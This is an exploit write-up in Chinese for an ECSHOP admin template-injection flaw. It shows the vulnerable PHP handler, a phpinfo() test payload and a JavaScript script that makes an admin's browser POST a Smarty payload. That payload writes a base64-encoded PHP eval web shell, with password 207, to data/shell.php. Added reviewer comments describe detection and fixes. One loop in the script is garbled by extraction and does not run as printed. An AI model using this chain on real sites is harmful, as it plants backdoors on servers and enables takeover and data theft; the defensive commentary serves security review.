ECSHOP 后台getshell

admin/order.php
[php]
elseif ($_REQUEST['act'] == 'edit_templates')

{

/* 更新模板文件的内容 */

$file_name = @fopen('../' . DATA_DIR . '/order_print.html', 'w+'); //写出模板,,只要有一个调用模板就可以getshell了

echo '../' . DATA_DIR . '/order_print.html';

echo stripslashes($_POST['FCKeditor1']);

@fwrite($file_name, stripslashes($_POST['FCKeditor1']));

@fclose($file_name);

/* 提示信息 */

$link[] = array('text' => $_LANG['back_list'], 'href'=>'order.php?act=list');

sys_msg($_LANG['edit_template_success'], 0, $link);

}

elseif ($_REQUEST['act'] == 'info')

{

省略若干

assign_query_info();

$smarty->display('order_info.htm');

}
}
[/php]
我们只需先向如下地址提交请求
127.0.0.1/ec/admin/order.php?act=edit_templates
POST 内容
FCKeditor1={if phpinfo()}{/if}
然后随便打开一个订单并点击打印：打印时会加载并渲染刚写入的 order_print.html 模板，其中的模板表达式随之被执行，因此就可以getshell了
ecshop1
ecshop2
附带一个 JavaScript 脚本
[php]
// Attacker-side proof of concept from the writeup, kept byte-identical. The
// for-loop header in the ActiveX branch below has been mangled by page
// extraction (its condition and increment are missing), so this listing does
// not run as printed. The comments added here are reviewer notes from the
// defender's side: what the two requests look like on the wire, what to look
// for in logs, and where the server-side fix belongs.
var request = false;
// Pick an XHR implementation: native XMLHttpRequest first, then the legacy
// ActiveX ProgIDs in the order listed.
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
// NOTE(review): the loop condition and increment were lost in extraction
// (the text after "i" up to "try" is gone); left as found.
for(var i=0; i try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request;
POSTa();

// Request 1: a POST to order.php?act=edit_templates whose FCKeditor1 field is
// written verbatim into the order_print.html template by the PHP excerpt above.
// The relative URL suggests it is meant to run inside an already-authenticated
// admin browser session (inferred, not stated by the author).
// Detection: a POST to admin/order.php with act=edit_templates whose body
// carries Smarty control tags ({if ...}{/if}) or function calls is a strong
// signal; the write target under data/ is worth file-integrity monitoring.
// Mitigation is server-side: the handler should not write request content into
// a rendered template without validation, and state-changing admin actions
// should require a CSRF token.
function POSTa(){
var postStr="FCKeditor1={if%20$fp%20=%20fopen(%22../data/shell.php%22,%20%27ab%27)}{/if}{if%20flock($fp, LOCK_EX)}{/if}{if%20fwrite($fp,%20base64_decode(%27PD9waHAgQGV2YWwoJF9QT1NUWycyMDcnXSk7Pz5z%27))}{/if}{if fclose($fp)}{/if}";// ../data/shell.php is the path of the generated one-line shell; its password is 207
xmlhttp.open("POST", "./order.php?act=edit_templates", true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", postStr.length);
xmlhttp.setRequestHeader("Connection", "close");
xmlhttp.send(postStr);
}

// Request 2: a GET to order.php?act=info&order_id=1&print=1 renders the freshly
// written template, which is what evaluates the embedded expressions. An
// edit_templates POST immediately followed by a print request from the same
// session is a useful correlation rule for access-log review.
new Image().src="./order.php?act=info&order_id=1&print=1";[/php]
